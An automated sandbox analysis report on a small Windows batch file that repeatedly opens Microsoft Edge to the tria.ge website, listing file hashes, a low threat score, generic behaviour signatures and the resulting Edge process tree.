bdd60c140dcaed0fb5d9b70fa74aa7bd96986eeb3f0a071490c986553b9c5bb0

Analysis

max time kernel
1727s
max time network
1695s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
18-08-2023 17:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.bat
Size

172B
MD5

621244c25f01e493720a232fb7750912
SHA1

10a6e98fd4067373fb30db762e8d326e356c02e6
SHA256

bdd60c140dcaed0fb5d9b70fa74aa7bd96986eeb3f0a071490c986553b9c5bb0
SHA512

6e8e9680160861125d58d3ec4d73f25d31b643759547fdb5abc9550035469138fd6bf65ab69062d1c179b378ca24b7e283eedff860d7b1836bb72c6c2d89d9b6

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4048	timeout.exe
3340	timeout.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
948	msedge.exe
948	msedge.exe
2800	msedge.exe
2800	msedge.exe
4364	msedge.exe
4364	msedge.exe
1956	msedge.exe
1956	msedge.exe
2992	msedge.exe
2992	msedge.exe
5820	msedge.exe
5820	msedge.exe
5328	identity_helper.exe
5328	identity_helper.exe
6468	msedge.exe
6468	msedge.exe
6468	msedge.exe
6468	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs

pid	Process
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 752 wrote to memory of 2792	752	cmd.exe	84
PID 752 wrote to memory of 2792	752	cmd.exe	84
PID 2792 wrote to memory of 4544	2792	msedge.exe	86
PID 2792 wrote to memory of 4544	2792	msedge.exe	86
PID 752 wrote to memory of 3840	752	cmd.exe	87
PID 752 wrote to memory of 3840	752	cmd.exe	87
PID 3840 wrote to memory of 4284	3840	msedge.exe	88
PID 3840 wrote to memory of 4284	3840	msedge.exe	88
PID 752 wrote to memory of 2992	752	cmd.exe	89
PID 752 wrote to memory of 2992	752	cmd.exe	89
PID 2992 wrote to memory of 4412	2992	msedge.exe	90
PID 2992 wrote to memory of 4412	2992	msedge.exe	90
PID 752 wrote to memory of 4144	752	cmd.exe	91
PID 752 wrote to memory of 4144	752	cmd.exe	91
PID 4144 wrote to memory of 1124	4144	msedge.exe	92
PID 4144 wrote to memory of 1124	4144	msedge.exe	92
PID 752 wrote to memory of 1712	752	cmd.exe	93
PID 752 wrote to memory of 1712	752	cmd.exe	93
PID 1712 wrote to memory of 3512	1712	msedge.exe	94
PID 1712 wrote to memory of 3512	1712	msedge.exe	94
PID 752 wrote to memory of 680	752	cmd.exe	95
PID 752 wrote to memory of 680	752	cmd.exe	95
PID 680 wrote to memory of 2716	680	msedge.exe	96
PID 680 wrote to memory of 2716	680	msedge.exe	96
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 4144 wrote to memory of 1872	4144	msedge.exe	102
PID 2992 wrote to memory of 764	2992	msedge.exe	103
PID 4144 wrote to memory of 1872	4144	msedge.exe	102

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New Text Document.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://tria.ge/
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2792
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe99fa46f8,0x7ffe99fa4708,0x7ffe99fa4718
    3⤵
    PID:4544
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,12931353569677392724,2984281497725620670,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1956
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,12931353569677392724,2984281497725620670,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
    3⤵
    PID:2236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://tria.ge/
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3840
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe99fa46f8,0x7ffe99fa4708,0x7ffe99fa4718
    3⤵
    PID:4284
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,6962477372335654153,3548784872311898551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2800
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,6962477372335654153,3548784872311898551,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
    3⤵
    PID:1308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://tria.ge/
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2992
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe99fa46f8,0x7ffe99fa4708,0x7ffe99fa4718
    3⤵
    PID:4412
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8
    3⤵
    PID:4880
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4364
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
    3⤵
    PID:764
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
    3⤵
    PID:1556
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
    3⤵
    PID:4276
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1
    3⤵
    PID:5316
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:1
    3⤵
    PID:5508
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
    3⤵
    PID:5648
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4396 /prefetch:1
    3⤵
    PID:5828
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
    3⤵
    PID:5960
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
    3⤵
    PID:5172
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
    3⤵
    PID:3520
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
    3⤵
    PID:5280
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
    3⤵
    PID:5856
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
    3⤵
    PID:6068
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:1
    3⤵
    PID:5540
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4424 /prefetch:1
    3⤵
    PID:7080
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4476 /prefetch:1
    3⤵
    PID:6340
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4360 /prefetch:1
    3⤵
    PID:6344
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7052 /prefetch:8
    3⤵
    PID:5344
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7052 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5328
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:1
    3⤵
    PID:1648
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1
    3⤵
    PID:4824
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1
    3⤵
    PID:1788
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
    3⤵
    PID:4736
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1
    3⤵
    PID:5568
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:1
    3⤵
    PID:3332
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,10810258773162960678,17067541451005589498,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2720 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://tria.ge/
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4144
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffe99fa46f8,0x7ffe99fa4708,0x7ffe99fa4718
    3⤵
    PID:1124
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,4613570982759592755,14383349366884360056,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:948
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,4613570982759592755,14383349366884360056,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
    3⤵
    PID:1872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://tria.ge/
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1712
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe99fa46f8,0x7ffe99fa4708,0x7ffe99fa4718
    3⤵
    PID:3512
